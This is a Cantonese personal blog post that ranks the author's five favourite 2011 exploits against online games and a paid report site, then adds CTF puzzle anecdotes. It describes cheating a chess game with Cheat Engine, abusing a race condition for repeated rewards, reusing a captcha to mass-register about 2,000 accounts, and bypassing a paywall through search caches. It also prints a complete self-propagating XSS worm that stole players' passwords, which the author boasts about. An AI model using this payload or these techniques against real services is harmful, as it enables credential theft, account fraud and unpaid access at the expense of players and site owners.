2012年1月1日 星期日

2011 Top 5 Incidents (by me.)

要我搵兩個都難啦仲要搵五個。



第五位:CYC 中國象棋 三步釘 下集
繼 2005 年可以搞到一 turn 行三步既 debug=1 個 trapdoor 響唔知幾時消失左之後,我決定 reverse engineer 下個 source code 睇下有冇更多蟲,睇怕都冇。
第一部係要搵到果堆 class 先。首先解左個最明顯果個:

之後你解下解下會解到去呢d (?!):

Clilet 絕對唔係串錯 Client,有興趣可以自己 search 下。
搵咁耐都係搵到下面兩句最有用(?)

public static final int ROOM_MASTER = 1;
public static final int ROOM_SLAVE = 2;

房主係 1 個客係 2 。
之後係咁以用個 Cheat Engine 改到啊 1 永遠都郁得。咁就唔止 1 turn 行 3 步咁濕碎啦。
*適用於任何 CYC 棋類遊戲



第四位:恐X王國 Asynchronous attack
Disclaimer: 呢個 Term 唔知有冇用錯。
幾時都話 atomicity 係好重要。隻 Game 每24小時可以參加一次比賽。每參加一次都會獲得6個加速器作為獎勵。當你 Click 參加,佢會派獎同埋記低你幾時參加過,如果係 within 24小時佢會 reject 你。好不幸地我一秒 Send 二百幾個 request 俾佢嘆。佢真係以為我參加左百幾次。
除左呢招之外仲有其他招,搞到俾人上 Forum 投訴,呢個唔講啦。



第三位:自動註冊某 Online game 帳號
(要 login ,所以條 Link 廢廢地)
話說個網個 captcha 可以 reuse。咁你不如唔好整 captcha。
結果註冊左二千幾隻帳號。果堆新手獎品據聞總值萬幾銀。



第二位:某陳年 Webgame Persistent XSS
呢個係由 2010 年年底玩到 2011 年年頭。真係有排玩。欲知詳情可以睇 世界末日 -2 周年果篇 Post。大概係隻 Game 可以 Set 角色顏色,顏色果度又冇 filter,乜都填得。
Payload 如下:

v='q=String.fromCharCode(39);w=%27v=%27+q+v+q+%27;eval(unescape(v))%27;function x(){try{return new XMLHttpRequest}catch(e){}try{return new ActiveXObject(%27Microsoft.XMLHTTP%27)}catch(e){}}try{c=String(top.opener.document.getElementsByTagName(%27font%27)[3].color+%271000%27).substring(1%2C7);z=top.opener.document.forms[0];u=z.usrid.value;s=z.usrpass.value;n=%27zone.cgi?sisetu=10&usrid=%27+u+%27&usrpass=%27+s+%27&chara=haxer&tegami=%27+u+%27:%27+s+%27&riyou=%27;k=x();k.open(%27GET%27%2Cn+41%2C1);k.send();o=x();o.open(%27GET%27%2Cn+51%2C1);o.send();m=x();m.open(%27GET%27%2C%27zone.cgi?sisetu=7&riyou=31&usrid=%27+u+%27&usrpass=%27+s+%27&mojisyoku=%27+encodeURIComponent(c+%27%3E%3Cbody%20onload%3D%22%27+w+%27%22%27)%2C1);m.send()}catch(e){}';eval(unescape(v))

依家睇返真係唔知自己寫乜春。大概係自動幫人個 color 改做呢段 code ("Quine"),同埋 send 個密碼俾啊 haxer。後來偷左一大堆弱密碼,最常出現就係電話號碼。



第一位:免費睇業界報告 (原價: €49 per month)
話說呢單野同我冇乜關係。不過我諗唔到有其他野可以排第一位。因為呢個真係好值錢,又容易。

入到去揀個 Report,例如挪威特產咁。出到咁上下佢就彈 "You have entered a Subscriptors area."
之後如果你 Google 搵條 Link 然後 Click cache,就乜都睇到晒。

Q: 點搵返 Cache 都刪埋果D Reports?
A: 自己諗啦。提示:User-Agent



後記:話說六四果日去玩個好X難既 CTF Game 唔知咩事無端端過左一關。仲神奇過 AoR 個四大門神果關。我絕對有理由懷疑呢類所謂 Online Ribble 既物體都係個作者用黎 Show Off 用。果關係一幅圖,19025 * 1 px,隱藏左某D字。正常人梗係砌個長方形,於是用強大既計數機:
咁咪試下 761 * 25 咁排啦,出左一堆怪字,點知又唔係個過關密碼。
撞下撞下 撞個 900 * 22,見到另一組字,重覆左兩次。 咁試 450 * 43,都係果一組字,但係出現一次,咁唔知點解果個就係過關密碼。

後來有關係「經典密碼學」喎,咁難得有D熟野就梗係試下。試左成日都過唔到,要答咩 crest hype。用個字典程式捽到一個字,但係又覺得完全唔關事,問智囊團又冇人識。爆答案之後話係 Headline Puzzle,堆 space 俾佢食晒,堆 headline 仲要係假既 (好似話同拉登有關)。最後果關膠關好似冇人過到,同埃屍果關 Autokey 一樣咁硬膠。

後來同班智囊團玩真既 Headline Puzzle。仲玩到要睇「學術文獻」話有個 Smith matrix 既 "measure of goodness",搞到好似讀緊 Stats 咁。其實個 MoG 係數有幾多對連續字母,越大越好。之前整左個 excel file 去解,有興趣可以問我。

文獻:
http://home.earthlink.net/~fpcorr/Headlines/Decimator.html

SPAM.